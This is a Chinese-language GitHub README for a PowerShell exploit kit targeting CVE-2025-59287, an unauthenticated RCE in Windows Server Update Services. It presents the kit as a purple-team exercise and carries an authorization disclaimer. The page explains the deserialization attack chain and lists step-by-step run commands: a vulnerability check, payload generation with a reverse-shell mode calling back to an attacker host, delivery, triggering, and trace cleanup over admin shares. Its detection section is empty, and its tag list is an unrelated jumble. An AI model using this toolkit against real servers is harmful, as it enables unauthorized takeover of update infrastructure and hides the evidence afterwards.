swoon69/CVE-2025-59287-Exercise-Use
GitHub: swoon69/CVE-2025-59287-Exercise-Use
针对 WSUS 服务未认证 RCE 漏洞的紫队演练脚本,通过恶意反序列化 payload 注入实现远程代码执行。
Stars: 0 | Forks: 0
# CVE-2025-59287 — WSUS 未认证 RCE
CVE-2025-59287 的紫队演练脚本,这是 Windows Server Update Services (WSUS) 中的一个未认证远程代码执行漏洞。
**仅供授权使用。** 仅限于您拥有或已获得明确书面测试许可的系统,在受控演练环境中使用。
## 工作原理
该漏洞利用可匿名访问的 WSUS SOAP 端点,将恶意反序列化 payload 注入 WSUS 数据库。当打开 WSUS 管理控制台或触发同步时,payload 将被执行。
1. WSUS 认证服务向任何匿名客户端签发有效 token
2. 通过客户端 Web 服务将 token 交换为报告会话 cookie
3. 通过报告服务将恶意序列化对象注入 WSUS 数据库
4. 当 WSUS 控制台加载或同步事件触发时,payload 执行
## 环境要求
- 装有 PowerShell 5.1+ 的 Windows 攻击机
- 能够通过网络访问端口 `8530` 上的 WSUS
- 将 ysoserial.net 放置在 `ysoserial\Release\` 文件夹中(参见设置)
## 仓库结构
```
wsus-cve-2025-59287/
├── 1-check.ps1 # Verify target is vulnerable
├── 2-generate.ps1 # Generate serialized payload blob
├── 3-deliver.ps1 # Deliver payload to WSUS server
├── 4-verify.ps1 # Verify execution and clean up
├── ysoserial/ # Place ysoserial.net release here (not committed)
│ └── Release/
│ └── ysoserial.exe
└── README.md
```
## 设置
克隆或下载仓库。添加 ysoserial.net,确保路径匹配 `ysoserial\Release\ysoserial.exe`。
从此处下载 ysoserial.net:
https://github.com/pwntester/ysoserial.net/releases/tag/v1.36
默认情况下这将触发 Windows Defender
## 用法
从仓库根目录运行所有脚本。
### 1 — 检查
```
.\1-check.ps1 -TargetURL "http://:8530"
```
### 2 — 生成
文件投放(无需监听器,建议首选):
```
.\2-generate.ps1 -Mode filedrop
```
反向 shell:
```
.\2-generate.ps1 -Mode shell -LHost -LPort 4444
```
### 3 — 投递
```
.\3-deliver.ps1 -TargetURL "http://:8530"
```
### 4 — 触发
在 WSUS 服务器上,通过“开始” > “Windows Server Update Services”打开管理控制台,或通过 PowerShell 触发同步:
```
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()
```
### 5 — 验证与清理
验证执行情况:
```
.\4-verify.ps1
```
验证并清理所有痕迹:
```
.\4-verify.ps1 -Cleanup
```
通过管理共享从攻击机执行:
```
.\4-verify.ps1 -WsusIP -Cleanup
```
清理后,在 WSUS 控制台的“计算机”下移除演练计算机。
## 检测机会
## 参考资料
- CVE-2025-59287 — 原始研究:hawktrace.com\
- [ysoserial](https://github.com/pwntester/ysoserial.net/releases/tag/v1.36)
- [NIST](https://nvd.nist.gov/vuln/detail/CVE-2025-59287)
- [.NET Exploit/Blob gen](https://github.com/pwntester/ysoserial.net)
- [tecxx](https://github.com/tecxx/CVE-2025-59287-WSUS/blob/main/wsus-rce.ps1)
- [mrk336](https://github.com/mrk336/Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat)
标签:AI合规, CISA项目, Conpot, CTF学习, CVE-2025-59287, DNS枚举, IPv6, Libemu, PE 加载器, PoC, PowerShell, RCE, SOAP注入, Windows Server Update Services, Windows安全, WSUS漏洞, ysoserial.net, 内网渗透, 反序列化漏洞, 多人体追踪, 暴力破解, 未授权访问, 漏洞利用脚本, 紫队工具, 编程工具, 网络安全工具, 远程代码执行, 高危漏洞